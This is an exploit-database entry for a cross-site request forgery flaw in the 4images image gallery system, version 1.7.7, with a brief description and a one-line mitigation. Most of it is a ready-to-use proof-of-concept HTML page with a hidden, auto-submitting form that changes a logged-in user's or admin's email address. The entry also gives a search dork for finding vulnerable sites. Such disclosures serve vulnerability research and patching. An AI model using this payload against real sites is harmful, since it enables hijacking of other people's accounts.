4images - Image Gallery Management System - [CSRF] Change mail user or admin

vendor:

Image Gallery Management System

by:

Dmar al3noOoz

8,8

CVSS

HIGH

Cross-Site Request Forgery (CSRF)

352

CWE

Product Name: Image Gallery Management System

Affected Version From: 1.7.7

Affected Version To: 1.7.7

Patch Exists: NO

Related CWE: N/A

CPE: 4homepages.de

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2020

4images – Image Gallery Management System – [CSRF] Change mail user or admin

A CSRF vulnerability exists in 4images - Image Gallery Management System version 1.7.7, which allows an attacker to change the mail of a user or admin by sending a malicious link. The malicious link contains a form with hidden fields that contain the new mail address. When the victim visits the malicious link, the form is automatically submitted and the mail address is changed.

Mitigation:

The application should implement a CSRF token to verify the authenticity of the request.

Source

Exploit-DB raw data:

########################################################################################################
# Title: 4images - Image Gallery Management System - [CSRF] Change mail user or admin  

# Author: Dmar al3noOoz  

# Mail : wafee_s[at]hotmail.com 

# Name : 4images - Image Gallery Management System

# dork : Google Dork: "4images - Image Gallery Management System"

# Software Link : http://www.4homepages.de

# Version: 1.7.7  
##############################################  Exploit  ##############################################  

<html>
<body onload="javascript:fireForms()">
<script language="JavaScript">
var pauses = new Array( "1062" );

function pausecomp(millis)
{
    var date = new Date();
    var curDate = null;

    do { curDate = new Date(); }
    while(curDate-date < millis);
}

function fireForms()
{
    var count = 1;
    var i=0;
    
    for(i=0; i<count; i++)
    {
        document.forms[i].submit();
        
        pausecomp(pauses[i]);
    }
}
    
</script>
<form method="POST" name="form0" action="http://www.XXXXXX.com/patch/member.php">
<input type="hidden" name="user_email" value="you mail"/>
<input type="hidden" name="user_email2" value="you mail"/>
<input type="hidden" name="action" value="updateprofile"/>
</form>
</body>
</html>



-=-=-=-=-=-=--=-=-=-=-=-=--=-=-=-=-=-=--=-=-=-=-=-=--=-=-=-=-=-=-Greetz-=-=-=-=-=-=--=-=-=-=-=-=--=-=-=-=-=-=--=-=-=-=-=-=--=-=-=-=-=-=-
-=- v4-team.com - Evil-Cod3r - dmar hacker - dr.Dmar - Dmaral7roOob - Ra7aLAlgnob - Mr.law - Alkeasr20 - Mr.black - Cyber-CrysTaL    -=-
-=-                                          Team 19vr - RootAl3noz - all Friend - exploit-db.com                                    -=-
-=-=-=-=-=-=--=-=-=-=-=-=--=-=-=-=-=-=--=-=-=-=-=-=--=-=-=-=-=-=--=-=-=-=-=-=--=-=-=-=-=-=--=-=-=-=-=-=--=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-